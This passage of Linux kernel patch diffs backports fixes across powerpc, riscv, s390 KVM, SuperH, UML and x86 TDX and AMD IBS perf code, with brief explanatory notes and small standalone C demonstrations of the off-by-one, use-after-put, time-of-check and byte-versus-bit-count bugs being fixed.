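(inclusive): nr_pfn pages starting at start_pfn occupy pfns up to
start_pfn + nr_pfn - 1, so the old check flagged a range ending exactly on the
boundary as crossing it. A standalone demonstration of the off-by-one, under
that inclusive-end reading:

#include <stdbool.h>
#include <stdio.h>

static bool crosses_old(unsigned long start, unsigned long nr, unsigned long end)
{
	return (start + nr) > end;
}

static bool crosses_new(unsigned long start, unsigned long nr, unsigned long end)
{
	return (start + nr - 1) > end;
}

int main(void)
{
	/* 256 pfns starting at pfn 256; the altmap ends at pfn 511 inclusive */
	printf("old=%d new=%d\n",
	       crosses_old(256, 256, 511),	/* 1: false positive */
	       crosses_new(256, 256, 511));	/* 0: fits exactly */
	return 0;
}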
+diff --git a/arch/powerpc/platforms/powernv/pci-sriov.c b/arch/powerpc/platforms/powernv/pci-sriov.c
+index 7195133b26bb9..59882da3e7425 100644
+--- a/arch/powerpc/platforms/powernv/pci-sriov.c
++++ b/arch/powerpc/platforms/powernv/pci-sriov.c
+@@ -594,12 +594,12 @@ static void pnv_pci_sriov_disable(struct pci_dev *pdev)
+ 	struct pnv_iov_data   *iov;
+ 
+ 	iov = pnv_iov_get(pdev);
+-	num_vfs = iov->num_vfs;
+-	base_pe = iov->vf_pe_arr[0].pe_number;
+-
+ 	if (WARN_ON(!iov))
+ 		return;
+ 
++	num_vfs = iov->num_vfs;
++	base_pe = iov->vf_pe_arr[0].pe_number;
++
+ 	/* Release VF PEs */
+ 	pnv_ioda_release_vf_PE(pdev);
+ 
+diff --git a/arch/powerpc/platforms/powernv/vas-window.c b/arch/powerpc/platforms/powernv/vas-window.c
+index 0072682531d80..b664838008c12 100644
+--- a/arch/powerpc/platforms/powernv/vas-window.c
++++ b/arch/powerpc/platforms/powernv/vas-window.c
+@@ -1310,8 +1310,8 @@ int vas_win_close(struct vas_window *vwin)
+ 	/* if send window, drop reference to matching receive window */
+ 	if (window->tx_win) {
+ 		if (window->user_win) {
+-			put_vas_user_win_ref(&vwin->task_ref);
+ 			mm_context_remove_vas_window(vwin->task_ref.mm);
++			put_vas_user_win_ref(&vwin->task_ref);
+ 		}
+ 		put_rx_win(window->rxwin);
+ 	}
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 94c023bb13e05..880b962afc057 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -507,8 +507,8 @@ static int vas_deallocate_window(struct vas_window *vwin)
+ 	vascaps[win->win_type].nr_open_windows--;
+ 	mutex_unlock(&vas_pseries_mutex);
+ 
+-	put_vas_user_win_ref(&vwin->task_ref);
+ 	mm_context_remove_vas_window(vwin->task_ref.mm);
++	put_vas_user_win_ref(&vwin->task_ref);
+ 
+ 	kfree(win);
+ 	return 0;
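
Both VAS hunks apply the same ordering rule: anything that still dereferences
vwin->task_ref must run before put_vas_user_win_ref() drops the reference that
keeps it alive. As a sketch (assuming, from the shape of the fix, that the put
may release the mm the next call would touch):

/* fixed order: use task_ref.mm while the reference is still held */
mm_context_remove_vas_window(vwin->task_ref.mm);
put_vas_user_win_ref(&vwin->task_ref);	/* may free what task_ref points at */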
+diff --git a/arch/riscv/kernel/probes/uprobes.c b/arch/riscv/kernel/probes/uprobes.c
+index c976a21cd4bd5..194f166b2cc40 100644
+--- a/arch/riscv/kernel/probes/uprobes.c
++++ b/arch/riscv/kernel/probes/uprobes.c
+@@ -67,6 +67,7 @@ int arch_uprobe_post_xol(struct arch_uprobe *auprobe, struct pt_regs *regs)
+ 	struct uprobe_task *utask = current->utask;
+ 
+ 	WARN_ON_ONCE(current->thread.bad_cause != UPROBE_TRAP_NR);
++	current->thread.bad_cause = utask->autask.saved_cause;
+ 
+ 	instruction_pointer_set(regs, utask->vaddr + auprobe->insn_size);
+ 
+@@ -102,6 +103,7 @@ void arch_uprobe_abort_xol(struct arch_uprobe *auprobe, struct pt_regs *regs)
+ {
+ 	struct uprobe_task *utask = current->utask;
+ 
++	current->thread.bad_cause = utask->autask.saved_cause;
+ 	/*
+ 	 * Task has received a fatal signal, so reset back to probed
+ 	 * address.
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index d8d97df801909..9390cdff39ffc 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -255,7 +255,6 @@ static void __init setup_bootmem(void)
+ 	dma_contiguous_reserve(dma32_phys_limit);
+ 	if (IS_ENABLED(CONFIG_64BIT))
+ 		hugetlb_cma_reserve(PUD_SHIFT - PAGE_SHIFT);
+-	memblock_allow_resize();
+ }
+ 
+ #ifdef CONFIG_MMU
+@@ -1211,6 +1210,9 @@ void __init paging_init(void)
+ {
+ 	setup_bootmem();
+ 	setup_vm_final();
++
++	/* Depends on the linear mapping being ready */
++	memblock_allow_resize();
+ }
+ 
+ void __init misc_mem_init(void)
+diff --git a/arch/s390/kvm/diag.c b/arch/s390/kvm/diag.c
+index 807fa9da1e721..3c65b8258ae67 100644
+--- a/arch/s390/kvm/diag.c
++++ b/arch/s390/kvm/diag.c
+@@ -166,6 +166,7 @@ static int diag9c_forwarding_overrun(void)
+ static int __diag_time_slice_end_directed(struct kvm_vcpu *vcpu)
+ {
+ 	struct kvm_vcpu *tcpu;
++	int tcpu_cpu;
+ 	int tid;
+ 
+ 	tid = vcpu->run->s.regs.gprs[(vcpu->arch.sie_block->ipa & 0xf0) >> 4];
+@@ -181,14 +182,15 @@ static int __diag_time_slice_end_directed(struct kvm_vcpu *vcpu)
+ 		goto no_yield;
+ 
+ 	/* target guest VCPU already running */
+-	if (READ_ONCE(tcpu->cpu) >= 0) {
++	tcpu_cpu = READ_ONCE(tcpu->cpu);
++	if (tcpu_cpu >= 0) {
+ 		if (!diag9c_forwarding_hz || diag9c_forwarding_overrun())
+ 			goto no_yield;
+ 
+ 		/* target host CPU already running */
+-		if (!vcpu_is_preempted(tcpu->cpu))
++		if (!vcpu_is_preempted(tcpu_cpu))
+ 			goto no_yield;
+-		smp_yield_cpu(tcpu->cpu);
++		smp_yield_cpu(tcpu_cpu);
+ 		VCPU_EVENT(vcpu, 5,
+ 			   "diag time slice end directed to %d: yield forwarded",
+ 			   tid);
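
This is a time-of-check/time-of-use repair: tcpu->cpu can change between the
>= 0 test and the vcpu_is_preempted()/smp_yield_cpu() calls, so it is sampled
once and the snapshot is used throughout. A compact standalone rendering of the
pattern, with READ_ONCE() modeled as a volatile read (the kernel macro is
stronger in detail, but equivalent for this illustration):

#include <stdio.h>

#define READ_ONCE(x) (*(const volatile __typeof__(x) *)&(x))

struct vcpu { int cpu; };	/* toy stand-in */

static void yield_to(struct vcpu *tcpu)
{
	int tcpu_cpu = READ_ONCE(tcpu->cpu);	/* one snapshot */

	if (tcpu_cpu >= 0)	/* the check ... */
		printf("yield to cpu %d\n", tcpu_cpu);	/* ... and the use agree */
}

int main(void)
{
	struct vcpu v = { .cpu = 3 };

	yield_to(&v);
	return 0;
}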
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index 26f89ec3062ba..3775363471f0c 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -2147,6 +2147,10 @@ static unsigned long kvm_s390_next_dirty_cmma(struct kvm_memslots *slots,
+ 		ms = container_of(mnode, struct kvm_memory_slot, gfn_node[slots->node_idx]);
+ 		ofs = 0;
+ 	}
++
++	if (cur_gfn < ms->base_gfn)
++		ofs = 0;
++
+ 	ofs = find_next_bit(kvm_second_dirty_bitmap(ms), ms->npages, ofs);
+ 	while (ofs >= ms->npages && (mnode = rb_next(mnode))) {
+ 		ms = container_of(mnode, struct kvm_memory_slot, gfn_node[slots->node_idx]);
+diff --git a/arch/s390/kvm/vsie.c b/arch/s390/kvm/vsie.c
+index ace2541ababd3..740f8b56e63f9 100644
+--- a/arch/s390/kvm/vsie.c
++++ b/arch/s390/kvm/vsie.c
+@@ -169,7 +169,8 @@ static int setup_apcb00(struct kvm_vcpu *vcpu, unsigned long *apcb_s,
+ 			    sizeof(struct kvm_s390_apcb0)))
+ 		return -EFAULT;
+ 
+-	bitmap_and(apcb_s, apcb_s, apcb_h, sizeof(struct kvm_s390_apcb0));
++	bitmap_and(apcb_s, apcb_s, apcb_h,
++		   BITS_PER_BYTE * sizeof(struct kvm_s390_apcb0));
+ 
+ 	return 0;
+ }
+@@ -191,7 +192,8 @@ static int setup_apcb11(struct kvm_vcpu *vcpu, unsigned long *apcb_s,
+ 			    sizeof(struct kvm_s390_apcb1)))
+ 		return -EFAULT;
+ 
+-	bitmap_and(apcb_s, apcb_s, apcb_h, sizeof(struct kvm_s390_apcb1));
++	bitmap_and(apcb_s, apcb_s, apcb_h,
++		   BITS_PER_BYTE * sizeof(struct kvm_s390_apcb1));
+ 
+ 	return 0;
+ }
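
The bug pattern here is a byte count passed where a bit count is expected:
bitmap_and()'s length argument is in bits, so sizeof(struct ...) intersected
only the first handful of bits and the rest of the guest-supplied mask escaped
the host filter. A self-contained toy with 16-byte masks and a bit-granular AND
(the real helper works on unsigned long words, this is only illustrative):

#include <stdio.h>
#include <string.h>

#define BITS_PER_BYTE 8

static void bitmap_and_bits(unsigned char *dst, const unsigned char *a,
			    const unsigned char *b, unsigned int nbits)
{
	for (unsigned int i = 0; i < nbits; i++) {
		if ((a[i / 8] & b[i / 8]) & (1u << (i % 8)))
			dst[i / 8] |= 1u << (i % 8);
		else
			dst[i / 8] &= ~(1u << (i % 8));
	}
}

int main(void)
{
	unsigned char s[16], h[16], out[16];

	memset(s, 0xff, sizeof(s));	/* guest asks for everything */
	memset(h, 0x00, sizeof(h));	/* host allows nothing */

	memcpy(out, s, sizeof(out));
	bitmap_and_bits(out, s, h, sizeof(s));	/* buggy: 16 "bits" */
	printf("byte 0: %#x, byte 15: %#x\n", out[0], out[15]);	/* 0 and 0xff */

	memcpy(out, s, sizeof(out));
	bitmap_and_bits(out, s, h, BITS_PER_BYTE * sizeof(s));	/* 128 bits */
	printf("byte 15 now: %#x\n", out[15]);	/* 0 */
	return 0;
}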
+diff --git a/arch/sh/boards/mach-dreamcast/irq.c b/arch/sh/boards/mach-dreamcast/irq.c
+index cc06e4cdb4cdf..0eec82fb85e7c 100644
+--- a/arch/sh/boards/mach-dreamcast/irq.c
++++ b/arch/sh/boards/mach-dreamcast/irq.c
+@@ -108,13 +108,13 @@ int systemasic_irq_demux(int irq)
+ 	__u32 j, bit;
+ 
+ 	switch (irq) {
+-	case 13:
++	case 13 + 16:
+ 		level = 0;
+ 		break;
+-	case 11:
++	case 11 + 16:
+ 		level = 1;
+ 		break;
+-	case  9:
++	case 9 + 16:
+ 		level = 2;
+ 		break;
+ 	default:
+diff --git a/arch/sh/boards/mach-highlander/setup.c b/arch/sh/boards/mach-highlander/setup.c
+index 533393d779c2b..01565660a6695 100644
+--- a/arch/sh/boards/mach-highlander/setup.c
++++ b/arch/sh/boards/mach-highlander/setup.c
+@@ -389,10 +389,10 @@ static unsigned char irl2irq[HL_NR_IRL];
+ 
+ static int highlander_irq_demux(int irq)
+ {
+-	if (irq >= HL_NR_IRL || irq < 0 || !irl2irq[irq])
++	if (irq >= HL_NR_IRL + 16 || irq < 16 || !irl2irq[irq - 16])
+ 		return irq;
+ 
+-	return irl2irq[irq];
++	return irl2irq[irq - 16];
+ }
+ 
+ static void __init highlander_init_irq(void)
+diff --git a/arch/sh/boards/mach-r2d/irq.c b/arch/sh/boards/mach-r2d/irq.c
+index e34f81e9ae813..d0a54a9adbce2 100644
+--- a/arch/sh/boards/mach-r2d/irq.c
++++ b/arch/sh/boards/mach-r2d/irq.c
+@@ -117,10 +117,10 @@ static unsigned char irl2irq[R2D_NR_IRL];
+ 
+ int rts7751r2d_irq_demux(int irq)
+ {
+-	if (irq >= R2D_NR_IRL || irq < 0 || !irl2irq[irq])
++	if (irq >= R2D_NR_IRL + 16 || irq < 16 || !irl2irq[irq - 16])
+ 		return irq;
+ 
+-	return irl2irq[irq];
++	return irl2irq[irq - 16];
+ }
+ 
+ /*
+diff --git a/arch/sh/cchips/Kconfig b/arch/sh/cchips/Kconfig
+index efde2edb56278..9659a0bc58dec 100644
+--- a/arch/sh/cchips/Kconfig
++++ b/arch/sh/cchips/Kconfig
+@@ -29,9 +29,9 @@ endchoice
+ config HD64461_IRQ
+ 	int "HD64461 IRQ"
+ 	depends on HD64461
+-	default "36"
++	default "52"
+ 	help
+-	  The default setting of the HD64461 IRQ is 36.
++	  The default setting of the HD64461 IRQ is 52.
+ 
+ 	  Do not change this unless you know what you are doing.
+ 
+diff --git a/arch/sh/drivers/dma/dma-sh.c b/arch/sh/drivers/dma/dma-sh.c
+index 96c626c2cd0a4..306fba1564e5e 100644
+--- a/arch/sh/drivers/dma/dma-sh.c
++++ b/arch/sh/drivers/dma/dma-sh.c
+@@ -18,6 +18,18 @@
+ #include <cpu/dma-register.h>
+ #include <cpu/dma.h>
+ 
++/*
++ * Some of the SoCs feature two DMAC modules. In such a case, the channels are
++ * distributed equally among them.
++ */
++#ifdef	SH_DMAC_BASE1
++#define	SH_DMAC_NR_MD_CH	(CONFIG_NR_ONCHIP_DMA_CHANNELS / 2)
++#else
++#define	SH_DMAC_NR_MD_CH	CONFIG_NR_ONCHIP_DMA_CHANNELS
++#endif
++
++#define	SH_DMAC_CH_SZ		0x10
++
+ /*
+  * Define the default configuration for dual address memory-memory transfer.
+  * The 0x400 value represents auto-request, external->external.
+@@ -29,7 +41,7 @@ static unsigned long dma_find_base(unsigned int chan)
+ 	unsigned long base = SH_DMAC_BASE0;
+ 
+ #ifdef SH_DMAC_BASE1
+-	if (chan >= 6)
++	if (chan >= SH_DMAC_NR_MD_CH)
+ 		base = SH_DMAC_BASE1;
+ #endif
+ 
+@@ -40,13 +52,13 @@ static unsigned long dma_base_addr(unsigned int chan)
+ {
+ 	unsigned long base = dma_find_base(chan);
+ 
+-	/* Normalize offset calculation */
+-	if (chan >= 9)
+-		chan -= 6;
+-	if (chan >= 4)
+-		base += 0x10;
++	chan = (chan % SH_DMAC_NR_MD_CH) * SH_DMAC_CH_SZ;
++
++	/* DMAOR is placed inside the channel register space. Step over it. */
++	if (chan >= DMAOR)
++		base += SH_DMAC_CH_SZ;
+ 
+-	return base + (chan * 0x10);
++	return base + chan;
+ }
+ 
+ #ifdef CONFIG_SH_DMA_IRQ_MULTI
+@@ -250,12 +262,11 @@ static int sh_dmac_get_dma_residue(struct dma_channel *chan)
+ #define NR_DMAOR	1
+ #endif
+ 
+-/*
+- * DMAOR bases are broken out amongst channel groups. DMAOR0 manages
+- * channels 0 - 5, DMAOR1 6 - 11 (optional).
+- */
+-#define dmaor_read_reg(n)		__raw_readw(dma_find_base((n)*6))
+-#define dmaor_write_reg(n, data)	__raw_writew(data, dma_find_base(n)*6)
++#define dmaor_read_reg(n)		__raw_readw(dma_find_base((n) * \
++						    SH_DMAC_NR_MD_CH) + DMAOR)
++#define dmaor_write_reg(n, data)	__raw_writew(data, \
++						     dma_find_base((n) * \
++						     SH_DMAC_NR_MD_CH) + DMAOR)
+ 
+ static inline int dmaor_reset(int no)
+ {
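
The rewritten address math is easier to see with concrete numbers. A standalone
sketch, with assumed values: 6 channels per DMAC module, 0x10 bytes of registers
per channel, DMAOR at offset 0x40 inside the block, and made-up module base
addresses (the real ones come from <cpu/dma-register.h> and <cpu/dma.h>):

#include <stdio.h>

#define SH_DMAC_BASE0		0xffa00000UL	/* assumed */
#define SH_DMAC_BASE1		0xffa00070UL	/* assumed */
#define SH_DMAC_NR_MD_CH	6
#define SH_DMAC_CH_SZ		0x10
#define DMAOR			0x40		/* assumed offset */

static unsigned long dma_base_addr(unsigned int chan)
{
	unsigned long base = chan >= SH_DMAC_NR_MD_CH ? SH_DMAC_BASE1
						      : SH_DMAC_BASE0;
	unsigned int off = (chan % SH_DMAC_NR_MD_CH) * SH_DMAC_CH_SZ;

	/* DMAOR sits between channels 3 and 4; step over it */
	if (off >= DMAOR)
		off += SH_DMAC_CH_SZ;

	return base + off;
}

int main(void)
{
	for (unsigned int chan = 0; chan < 2 * SH_DMAC_NR_MD_CH; chan++)
		printf("chan %2u -> %#lx\n", chan, dma_base_addr(chan));
	return 0;
}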
+diff --git a/arch/sh/include/asm/hd64461.h b/arch/sh/include/asm/hd64461.h
+index afb24cb034b11..d2c485fa333b5 100644
+--- a/arch/sh/include/asm/hd64461.h
++++ b/arch/sh/include/asm/hd64461.h
+@@ -229,7 +229,7 @@
+ #define	HD64461_NIMR		HD64461_IO_OFFSET(0x5002)
+ 
+ #define	HD64461_IRQBASE		OFFCHIP_IRQ_BASE
+-#define	OFFCHIP_IRQ_BASE	64
++#define	OFFCHIP_IRQ_BASE	(64 + 16)
+ #define	HD64461_IRQ_NUM		16
+ 
+ #define	HD64461_IRQ_UART	(HD64461_IRQBASE+5)
+diff --git a/arch/sh/include/mach-common/mach/highlander.h b/arch/sh/include/mach-common/mach/highlander.h
+index fb44c299d0337..b12c795584225 100644
+--- a/arch/sh/include/mach-common/mach/highlander.h
++++ b/arch/sh/include/mach-common/mach/highlander.h
+@@ -176,7 +176,7 @@
+ #define IVDR_CK_ON	4		/* iVDR Clock ON */
+ #endif
+ 
+-#define HL_FPGA_IRQ_BASE	200
++#define HL_FPGA_IRQ_BASE	(200 + 16)
+ #define HL_NR_IRL		15
+ 
+ #define IRQ_AX88796		(HL_FPGA_IRQ_BASE + 0)
+diff --git a/arch/sh/include/mach-common/mach/r2d.h b/arch/sh/include/mach-common/mach/r2d.h
+index 0d7e483c7d3f5..69bc1907c5637 100644
+--- a/arch/sh/include/mach-common/mach/r2d.h
++++ b/arch/sh/include/mach-common/mach/r2d.h
+@@ -47,7 +47,7 @@
+ 
+ #define IRLCNTR1	(PA_BCR + 0)	/* Interrupt Control Register1 */
+ 
+-#define R2D_FPGA_IRQ_BASE	100
++#define R2D_FPGA_IRQ_BASE	(100 + 16)
+ 
+ #define IRQ_VOYAGER		(R2D_FPGA_IRQ_BASE + 0)
+ #define IRQ_EXT			(R2D_FPGA_IRQ_BASE + 1)
+diff --git a/arch/sh/include/mach-dreamcast/mach/sysasic.h b/arch/sh/include/mach-dreamcast/mach/sysasic.h
+index ed69ce7f20301..3b27be9a527ea 100644
+--- a/arch/sh/include/mach-dreamcast/mach/sysasic.h
++++ b/arch/sh/include/mach-dreamcast/mach/sysasic.h
+@@ -22,7 +22,7 @@
+    takes.
+ */
+ 
+-#define HW_EVENT_IRQ_BASE  48
++#define HW_EVENT_IRQ_BASE  (48 + 16)
+ 
+ /* IRQ 13 */
+ #define HW_EVENT_VSYNC     (HW_EVENT_IRQ_BASE +  5) /* VSync */
+diff --git a/arch/sh/include/mach-se/mach/se7724.h b/arch/sh/include/mach-se/mach/se7724.h
+index 1fe28820dfa95..ea6c46633b337 100644
+--- a/arch/sh/include/mach-se/mach/se7724.h
++++ b/arch/sh/include/mach-se/mach/se7724.h
+@@ -37,7 +37,7 @@
+ #define IRQ2_IRQ        evt2irq(0x640)
+ 
+ /* Bits in IRQ012 registers */
+-#define SE7724_FPGA_IRQ_BASE	220
++#define SE7724_FPGA_IRQ_BASE	(220 + 16)
+ 
+ /* IRQ0 */
+ #define IRQ0_BASE	SE7724_FPGA_IRQ_BASE
+diff --git a/arch/sh/kernel/cpu/sh2/probe.c b/arch/sh/kernel/cpu/sh2/probe.c
+index d342ea08843f6..70a07f4f2142f 100644
+--- a/arch/sh/kernel/cpu/sh2/probe.c
++++ b/arch/sh/kernel/cpu/sh2/probe.c
+@@ -21,7 +21,7 @@ static int __init scan_cache(unsigned long node, const char *uname,
+ 	if (!of_flat_dt_is_compatible(node, "jcore,cache"))
+ 		return 0;
+ 
+-	j2_ccr_base = (u32 __iomem *)of_flat_dt_translate_address(node);
++	j2_ccr_base = ioremap(of_flat_dt_translate_address(node), 4);
+ 
+ 	return 1;
+ }
+diff --git a/arch/sh/kernel/cpu/sh3/entry.S b/arch/sh/kernel/cpu/sh3/entry.S
+index e48b3dd996f58..b1f5b3c58a018 100644
+--- a/arch/sh/kernel/cpu/sh3/entry.S
++++ b/arch/sh/kernel/cpu/sh3/entry.S
+@@ -470,9 +470,9 @@ ENTRY(handle_interrupt)
+ 	mov	r4, r0		! save vector->jmp table offset for later
+ 
+ 	shlr2	r4		! vector to IRQ# conversion
+-	add	#-0x10, r4
+ 
+-	cmp/pz	r4		! is it a valid IRQ?
++	mov	#0x10, r5
++	cmp/hs	r5, r4		! is it a valid IRQ?
+ 	bt	10f
+ 
+ 	/*
+diff --git a/arch/um/Makefile b/arch/um/Makefile
+index f1d4d67157be0..3dbd0e3b660ea 100644
+--- a/arch/um/Makefile
++++ b/arch/um/Makefile
+@@ -148,7 +148,7 @@ export LDFLAGS_vmlinux := $(LDFLAGS_EXECSTACK)
+ # When cleaning we don't include .config, so we don't include
+ # TT or skas makefiles and don't clean skas_ptregs.h.
+ CLEAN_FILES += linux x.i gmon.out
+-MRPROPER_FILES += arch/$(SUBARCH)/include/generated
++MRPROPER_FILES += $(HOST_DIR)/include/generated
+ 
+ archclean:
+ 	@find . \( -name '*.bb' -o -name '*.bbg' -o -name '*.da' \
+diff --git a/arch/x86/coco/tdx/tdx.c b/arch/x86/coco/tdx/tdx.c
+index b8998cf0508a6..8a1d48b8c2a3e 100644
+--- a/arch/x86/coco/tdx/tdx.c
++++ b/arch/x86/coco/tdx/tdx.c
+@@ -756,6 +756,30 @@ static bool tdx_enc_status_changed(unsigned long vaddr, int numpages, bool enc)
+ 	return true;
+ }
+ 
++static bool tdx_enc_status_change_prepare(unsigned long vaddr, int numpages,
++					  bool enc)
++{
++	/*
++	 * Only handle shared->private conversion here.
++	 * See the comment in tdx_early_init().
++	 */
++	if (enc)
++		return tdx_enc_status_changed(vaddr, numpages, enc);
++	return true;
++}
++
++static bool tdx_enc_status_change_finish(unsigned long vaddr, int numpages,
++					 bool enc)
++{
++	/*
++	 * Only handle private->shared conversion here.
++	 * See the comment in tdx_early_init().
++	 */
++	if (!enc)
++		return tdx_enc_status_changed(vaddr, numpages, enc);
++	return true;
++}
++
+ void __init tdx_early_init(void)
+ {
+ 	u64 cc_mask;
+@@ -780,9 +804,30 @@ void __init tdx_early_init(void)
+ 	 */
+ 	physical_mask &= cc_mask - 1;
+ 
+-	x86_platform.guest.enc_cache_flush_required = tdx_cache_flush_required;
+-	x86_platform.guest.enc_tlb_flush_required   = tdx_tlb_flush_required;
+-	x86_platform.guest.enc_status_change_finish = tdx_enc_status_changed;
++	/*
++	 * The kernel mapping should match the TDX metadata for the page.
++	 * load_unaligned_zeropad() can touch memory *adjacent* to that which is
++	 * owned by the caller and can catch even _momentary_ mismatches.  Bad
++	 * things happen on mismatch:
++	 *
++	 *   - Private mapping => Shared Page  == Guest shutdown
++	 *   - Shared mapping  => Private Page == Recoverable #VE
++	 *
++	 * guest.enc_status_change_prepare() converts the page from
++	 * shared=>private before the mapping becomes private.
++	 *
++	 * guest.enc_status_change_finish() converts the page from
++	 * private=>shared after the mapping becomes shared.
++	 *
++	 * In both cases there is a temporary shared mapping to a private page,
++	 * which can result in a #VE.  But, there is never a private mapping to
++	 * a shared page.
++	 */
++	x86_platform.guest.enc_status_change_prepare = tdx_enc_status_change_prepare;
++	x86_platform.guest.enc_status_change_finish  = tdx_enc_status_change_finish;
++
++	x86_platform.guest.enc_cache_flush_required  = tdx_cache_flush_required;
++	x86_platform.guest.enc_tlb_flush_required    = tdx_tlb_flush_required;
+ 
+ 	pr_info("Guest detected\n");
+ }
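
The ordering the comment describes is enforced by the caller,
__set_memory_enc_pgtable() (touched further down in this patch). A simplified
sketch of that flow; change_mapping() is a stand-in name and error paths are
elided:

static int set_memory_enc_sketch(unsigned long addr, int numpages, bool enc)
{
	/* shared->private page conversion runs *before* the PTEs flip ... */
	if (!x86_platform.guest.enc_status_change_prepare(addr, numpages, enc))
		return -EIO;

	change_mapping(addr, numpages, enc);	/* ... the mapping changes ... */

	/* ... and private->shared conversion runs *after*, so any transient
	 * mismatch is shared-mapping => private-page (recoverable #VE),
	 * never private-mapping => shared-page (guest shutdown). */
	if (!x86_platform.guest.enc_status_change_finish(addr, numpages, enc))
		return -EIO;

	return 0;
}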
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 8ca5e827f30b2..6672a3f05fc68 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -374,7 +374,7 @@ static int amd_pmu_hw_config(struct perf_event *event)
+ 
+ 	/* pass precise event sampling to ibs: */
+ 	if (event->attr.precise_ip && get_ibs_caps())
+-		return -ENOENT;
++		return forward_event_to_ibs(event);
+ 
+ 	if (has_branch_stack(event) && !x86_pmu.lbr_nr)
+ 		return -EOPNOTSUPP;
+diff --git a/arch/x86/events/amd/ibs.c b/arch/x86/events/amd/ibs.c
+index 4cb710efbdd9a..37cbbc5c659a5 100644
+--- a/arch/x86/events/amd/ibs.c
++++ b/arch/x86/events/amd/ibs.c
+@@ -190,7 +190,7 @@ static struct perf_ibs *get_ibs_pmu(int type)
+ }
+ 
+ /*
+- * Use IBS for precise event sampling:
++ * core pmu config -> IBS config
+  *
+  *  perf record -a -e cpu-cycles:p ...    # use ibs op counting cycle count
+  *  perf record -a -e r076:p ...          # same as -e cpu-cycles:p
+@@ -199,25 +199,9 @@ static struct perf_ibs *get_ibs_pmu(int type)
+  * IbsOpCntCtl (bit 19) of IBS Execution Control Register (IbsOpCtl,
+  * MSRC001_1033) is used to select either cycle or micro-ops counting
+  * mode.
+- *
+- * The rip of IBS samples has skid 0. Thus, IBS supports precise
+- * levels 1 and 2 and the PERF_EFLAGS_EXACT is set. In rare cases the
+- * rip is invalid when IBS was not able to record the rip correctly.
+- * We clear PERF_EFLAGS_EXACT and take the rip from pt_regs then.
+- *
+  */
+-static int perf_ibs_precise_event(struct perf_event *event, u64 *config)
++static int core_pmu_ibs_config(struct perf_event *event, u64 *config)
+ {
+-	switch (event->attr.precise_ip) {
+-	case 0:
+-		return -ENOENT;
+-	case 1:
+-	case 2:
+-		break;
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-
+ 	switch (event->attr.type) {
+ 	case PERF_TYPE_HARDWARE:
+ 		switch (event->attr.config) {
+@@ -243,22 +227,37 @@ static int perf_ibs_precise_event(struct perf_event *event, u64 *config)
+ 	return -EOPNOTSUPP;
+ }
+ 
++/*
++ * The rip of IBS samples has skid 0. Thus, IBS supports precise
++ * levels 1 and 2 and the PERF_EFLAGS_EXACT is set. In rare cases the
++ * rip is invalid when IBS was not able to record the rip correctly.
++ * We clear PERF_EFLAGS_EXACT and take the rip from pt_regs then.
++ */
++int forward_event_to_ibs(struct perf_event *event)
++{
++	u64 config = 0;
++
++	if (!event->attr.precise_ip || event->attr.precise_ip > 2)
++		return -EOPNOTSUPP;
++
++	if (!core_pmu_ibs_config(event, &config)) {
++		event->attr.type = perf_ibs_op.pmu.type;
++		event->attr.config = config;
++	}
++	return -ENOENT;
++}
++
+ static int perf_ibs_init(struct perf_event *event)
+ {
+ 	struct hw_perf_event *hwc = &event->hw;
+ 	struct perf_ibs *perf_ibs;
+ 	u64 max_cnt, config;
+-	int ret;
+ 
+ 	perf_ibs = get_ibs_pmu(event->attr.type);
+-	if (perf_ibs) {
+-		config = event->attr.config;
+-	} else {
+-		perf_ibs = &perf_ibs_op;
+-		ret = perf_ibs_precise_event(event, &config);
+-		if (ret)
+-			return ret;
+-	}
++	if (!perf_ibs)
++		return -ENOENT;
++
++	config = event->attr.config;
+ 
+ 	if (event->pmu != &perf_ibs->pmu)
+ 		return -ENOENT;
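
The subtle part is that forward_event_to_ibs() returns -ENOENT even on success:
in the perf core, -ENOENT from event_init() means "not this PMU, keep looking",
and because attr.type has just been rewritten to the IBS op PMU the retry lands
there. Roughly, with illustrative stand-in names for the core's retry logic:

static int perf_init_event_sketch(struct perf_event *event)
{
	int ret = core_pmu_event_init(event);	/* may call forward_event_to_ibs() */

	if (ret == -ENOENT) {
		/* the core re-reads attr.type, which now names perf_ibs_op */
		ret = ibs_pmu_event_init(event);	/* reaches perf_ibs_init() */
	}
	return ret;
}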
+diff --git a/arch/x86/include/asm/perf_event.h b/arch/x86/include/asm/perf_event.h
+index 5d0f6891ae611..4d810b9478a43 100644
+--- a/arch/x86/include/asm/perf_event.h
++++ b/arch/x86/include/asm/perf_event.h
+@@ -467,8 +467,10 @@ struct pebs_xmm {
+ 
+ #ifdef CONFIG_X86_LOCAL_APIC
+ extern u32 get_ibs_caps(void);
++extern int forward_event_to_ibs(struct perf_event *event);
+ #else
+ static inline u32 get_ibs_caps(void) { return 0; }
++static inline int forward_event_to_ibs(struct perf_event *event) { return -ENOENT; }
+ #endif
+ 
+ #ifdef CONFIG_PERF_EVENTS
+diff --git a/arch/x86/include/asm/pgtable_64.h b/arch/x86/include/asm/pgtable_64.h
+index e479491da8d51..07cd53eeec770 100644
+--- a/arch/x86/include/asm/pgtable_64.h
++++ b/arch/x86/include/asm/pgtable_64.h
+@@ -237,8 +237,8 @@ static inline void native_pgd_clear(pgd_t *pgd)
+ 
+ #define __pte_to_swp_entry(pte)		((swp_entry_t) { pte_val((pte)) })
+ #define __pmd_to_swp_entry(pmd)		((swp_entry_t) { pmd_val((pmd)) })
+-#define __swp_entry_to_pte(x)		((pte_t) { .pte = (x).val })
+-#define __swp_entry_to_pmd(x)		((pmd_t) { .pmd = (x).val })
++#define __swp_entry_to_pte(x)		(__pte((x).val))
++#define __swp_entry_to_pmd(x)		(__pmd((x).val))
+ 
+ extern int kern_addr_valid(unsigned long addr);
+ extern void cleanup_highmap(void);
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index ebc271bb6d8ed..a0a58c4122ec3 100644
